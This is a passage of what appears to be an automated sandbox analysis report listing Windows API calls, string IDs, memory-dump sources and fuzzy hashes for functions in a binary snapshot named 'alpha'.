                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0515C32608B868AEB619F25DC603EBB7A4FF49748F844135DA4D4BA48DF3CD645CB10
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00007FF706EBB4BD
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EBB4DB), ref: 00007FF706EC06D6
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EBB4DB), ref: 00007FF706EC06F0
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EBB4DB), ref: 00007FF706EC074D
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EBB4DB), ref: 00007FF706EC0762
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00007FF706EBB518
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00007FF706EBB58B
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$_wcsicmp$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: ELSE$IF/?
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3223794493-1134991328
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 9e9c6d2df76423b86a132f8d1c96a54bc21f8d152575276308545f0da19725c9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90414921E09B43C2FB55BB24AC352BBA6A1BF54740FD46139D61E472A6DF3CE8018371
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$File_get_osfhandle$PointerReadlongjmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1532185241-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1c6a72294256c0d412322bc2bdf676a70003fefc2a48fff7776376e553141a5d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0341D432A147528BE754AB21DC6567FFAA1FF88B80F895535EB0A47785CF3CE8418710
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3588551418-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: f2ad0e1288994c78b38136c1c72dc95c389cf76207dbd40098ee7b0582e7d934
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B417B32A087428BE724AF11AC6027FF661FF94B84F985539DB0A47795DF2CE8408760
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ErrorModememset$FullNamePath_wcsicmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2123716050-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: bbaf5dedd0cbdd4485c46577773df657aecb1a5bcd9d4c4f0a46f38ce4e38573
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 34ee96bfd6a58e7886c4d778852199332be4e034c254dc2a1bf8aee503449b08
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bbaf5dedd0cbdd4485c46577773df657aecb1a5bcd9d4c4f0a46f38ce4e38573
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14418C32705BC28AEB319F25DC643EAA794FF49B88F844134DB4D4AA98EF3CD2458710
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Console$Window_get_osfhandle$InitializeModeUninitializememset
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3114114779-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 96c6c586a5ab1f5334fe5979924d9833b6c4458fe2cb3fb504c803d00f10e65d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5417C36A05B42CAEB00EF65DC502AE77A5FB98748F954135DE0D93B98DF38D416C360
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF706ED9A82), ref: 00007FF706EDA77A
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF706ED9A82), ref: 00007FF706EDA7AF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF706ED9A82), ref: 00007FF706EDA80E
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF706ED9A82), ref: 00007FF706EDA839
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF706ED9A82), ref: 00007FF706EDA850
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: QueryValue$CloseErrorLastOpen
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2240656346-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: ebdbc91e8d620a6daac55ff06a498b509cc749ebc3b674aa33d812a43480617d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D318036A18B8186E750AF19EC6447BF6A5FF88790F985134EB4E43794DF3CD9418B20
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC01B8: _get_osfhandle.MSVCRT ref: 00007FF706EC01C4
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC01B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF706ECE904,?,?,?,?,00000000,00007FF706EC3491,?,?,?,00007FF706ED4420), ref: 00007FF706EC01D6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF706EDD0F9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF706EDD10F
                                                                                                                                                                                                                                                                                                                                                                                                                                          • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF706EDD166
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF706EDD17A
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF706EDD18C
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3008996577-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b24dd98aebcb12925472f0963a1c8091bd4b0abe9c7a22edcb2826430f548124
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49212926B14B518AE710ABB1EC200BEB7B0FF4DB58B845125EE1D53B98EF38D045CB24
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CreateSemaphore
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: _p0$wil
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1078844751-1814513734
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6a523512e982a220c5e5f49bf3ffcf026087dac80177ebe14f5ff2bfeb0484b5
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF51D765B2978286EE21AF549C746BBE290FF84B94FE84435DB0D0B785DF3DE4058720
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlCreateUnicodeStringFromAsciiz.NTDLL ref: 00007FF706EDB934
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF706EC5085), ref: 00007FF706EDB9A5
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF706EC5085), ref: 00007FF706EDB9F7
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %WINDOWS_COPYRIGHT%
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1103618819-1745581171
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c715e966d7cdce478912b38ae3c7ad385e6d614edae18ac0cae38b5969a064ae
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C41A5A690878186EB10AF159C2027AB7A0FF69B94FCA5235DF4D07395EF3CE441C710
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$_wcslwr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: [%s]
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 886762496-302437576
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: edde6ab5db54e3a5535b346c374fc5c976f6442aa931e6f93dfa572844f0dcb2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: ce8a27e920f572e404f41a904e0e9e1f32ad4afac90b3a855897b1604137cddc
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: edde6ab5db54e3a5535b346c374fc5c976f6442aa931e6f93dfa572844f0dcb2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69315936715B8685EB21EF21EC603EAA7A0FF89B88F844135DA8D4BB55DF3CD2458710
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC33A8: iswspace.MSVCRT(?,?,00000000,00007FF706EDD6EE,?,?,?,00007FF706ED0632), ref: 00007FF706EC33C0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • iswspace.MSVCRT(?,?,?,00007FF706EC32A4), ref: 00007FF706EC331C
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: iswspace
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: off
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2389812497-733764931
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 46fdcb550e6f405988ca31f978f9db27044d08a16875aeef1306f421bca5f54b
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 93212A21E0C75281FA60BB19AD7927BF6A0FF45BA0F98C135D95E47685DF2CE8428221
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
